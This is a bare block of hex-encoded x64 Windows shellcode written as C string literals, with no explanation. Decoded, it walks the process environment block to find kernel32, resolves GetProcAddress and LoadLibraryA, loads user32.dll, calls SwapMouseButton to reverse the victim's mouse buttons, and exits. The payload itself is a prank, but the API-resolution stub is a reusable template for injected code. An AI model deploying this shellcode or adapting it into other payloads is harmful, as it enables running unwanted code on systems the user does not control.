"\x48\x31\xc0\x48\x89\xe3\x48\x83\xe4\xf0\x48\x83\xec\x30\x31\xc9"
"\x65\x48\x8b\x71\x60\x48\x8b\x76\x18\x48\x8b\x76\x20\x48\x8b\x36"
"\x48\x8b\x36\x48\x8b\x5e\x20\x8b\x53\x3c\x48\x8d\x14\x1a\x8b\x92"
"\x88\x00\x00\x00\x48\x8d\x14\x1a\x8b\x72\x20\x48\x8d\x34\x1e\x48"
"\x31\xc9\x8b\x04\x8e\x48\x89\xc0\x48\x01\xd8\x48\x31\xff\x8b\x38"
"\x81\xff\x47\x65\x74\x50\x75\x20\x8b\x40\x04\x3d\x72\x6f\x63\x41"
"\x75\x16\x8b\x40\x08\x3d\x65\x72\x64\x64\x75\x0c\x66\x8b\x40\x0c"
"\x66\x3d\x73\x73\x75\x02\xeb\x05\x48\xff\xc1\xeb\xc5\x8b\x72\x24"
"\x48\x01\xde\x0f\xb7\x0c\x4e\x8b\x72\x1c\x48\x01\xde\x8b\x04\x8e"
"\x48\x01\xd8\x49\x89\xc0\x48\xb8\x4c\x6f\x61\x64\x4c\x69\x62\x72"
"\x48\x89\x04\x24\xb8\x61\x72\x79\x41\x89\x44\x24\x08\x31\xc0\x48"
"\x8d\x7c\x24\x0c\xaa\x48\x89\xd9\x48\x8d\x14\x24\x41\xff\xd0\x49"
"\x89\xc1\x48\xb8\x75\x73\x65\x72\x33\x32\x2e\x64\x48\x89\x04\x24"
"\x66\xb8\x6c\x6c\x66\x89\x44\x24\x08\x31\xc0\x48\x8d\x7c\x24\x0a"
"\xaa\x48\x89\xe1\x41\xff\xd1\x48\x89\xc6\x48\xb8\x53\x77\x61\x70"
"\x4d\x6f\x75\x73\x48\x89\x04\x24\x48\x31\xc0\x04\x65\x48\xc1\xe0"
"\x08\x04\x42\x48\xc1\xe0\x08\x04\x75\x48\xc1\xe0\x08\x04\x74\x48"
"\xc1\xe0\x08\x04\x74\x48\xc1\xe0\x08\x04\x6f\x48\xc1\xe0\x08\x04"
"\x6e\xc6\x44\x24\x10\x6e\x30\xc0\x48\x8d\x7c\x24\x11\xaa\x48\x89"
"\xf1\x48\x8d\x14\x24\x41\xff\xd0\x48\x31\xc9\x48\xff\xc1\xff\xd0"
"\x48\xb8\x45\x78\x69\x74\x50\x72\x6f\x63\x48\x89\x04\x24\xb8\x73"
"\x65\x73\x73\x89\x44\x24\x08\x31\xc0\x48\x8d\x7c\x24\x0c\xaa\x48"
"\x89\xd9\x48\x8d\x14\x24\x41\xff\xd0\x48\x31\xc9\xff\xd0"
